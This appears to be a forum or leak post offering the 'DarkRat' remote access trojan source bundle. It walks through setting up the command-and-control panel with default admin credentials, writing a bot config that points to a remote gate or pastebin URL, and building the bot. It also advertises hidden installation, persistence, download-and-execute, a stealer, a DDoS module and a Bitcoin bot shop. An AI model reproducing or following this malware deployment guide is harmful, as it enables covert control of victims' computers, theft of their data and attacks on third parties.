
DarkRat + Dark HVNC + Panel + Spreader + Crypter (SOURCE)


DarkRAT is one of many remote access tools (RATs) used to control connected computers remotely. Unfortunately, in many cases, cyber criminals trick people into installing RATs onto their systems and then use them to steal personal details, infect systems with malware, and cause other damage.

Darkrat is designed as a HTTP loader, it is coded in C++ with no dependency, the Current bot is design for the Windows API! this means, DarkRat has no Cross Platform Support.

Getting Started

Connect to your Server via SSH Install Apache2, PHP7.x MYSQL (MariaDB Server in Ubuntu 18) and PHPMYADMIN Enable .htaccess from apache2 configurations. Create .htaccess file in your root directory and write inside:

<Directory /var/www/html>
  Options FollowSymLinks
  AllowOverride all
  Require all granted

Unpack the DarkRat.zip Upload Files to the root of your www (By Default /var/www/html/) on a new Installation delete the index.html Give www Write/Read/Execute permission on all uploaded files (chmod 777 ./*) open your domain oder serverip / Now you see the install page Flowing the Setup and install the Panel, or install it Manual by import the sql by default enter username: admin password: admin

Config Example:

<?php $pdo = new PDO('mysql:host=localhost;dbname=darkrat', 'username', 'password');

Build a Bot

Create a License file named darkrat.lic and enter your License Key. Create a file named config.json and enter your Gate Settings. Shortnames: ek = Encryption Key (Lenght 32) and pu = Pastebin URL OR Direct Encrypted URL

  "pu": "keRwrh9WFcNrWnCLM96VuBRRMCYg/UPgRTb09A=="
  • mux ⟶ A Random Mutex
  • sup ⟶ Startup true/false
  • ri ⟶ Request Interval in secounds
  • pre ⟶ Running Persistence true/false
  • st ⟶ Spread Tag
  • ua ⟶ User Agent for Post Requests
  • pn ⟶ Some Example for DarkRat Developers

Full Config Example

  "ek": "randomkey",
  "pu": "http://XXX.com/raw/random",
  "mux": "3mCUq1z",
  "sup": "false",
  "ri": "5",
  "pre": "false",
  "st": "main",
  "ua": "SUq1rx",
  "pn": { "FOO":"BAR" }

Open the builder.exe and enter your username Select create from Config File if you created one, if not select create from Terminal. Finished. spider.exe is created, Backtest your payload on a VM.


  • Template System based on Smarty
  • Dynamic URL Routing
  • Multi User Support
  • Plugin System
  • Statistics of Bots & online rates
  • Advanced Bot Informations
  • Task Tracking
  • Task Geo Targeting System
  • Task Software Targeting System (for .net software)

Bot 2.1.3

  • Running Persistence
  • Startup Persistence
  • Installed hidden on the FileSystem
  • Download & Execute
  • Update
  • Uninstall
  • Custom DLL Loading
  • Direct Connect or RAW forwarder (Like pastebin/gist also supported own plain/raw sites)

Included Plugins

  • Botshop with autobuy Bitcoin API
  • Alpha version of a DDOS
  • HVNC
  • Stealer
  • BackConnect

Password: passwd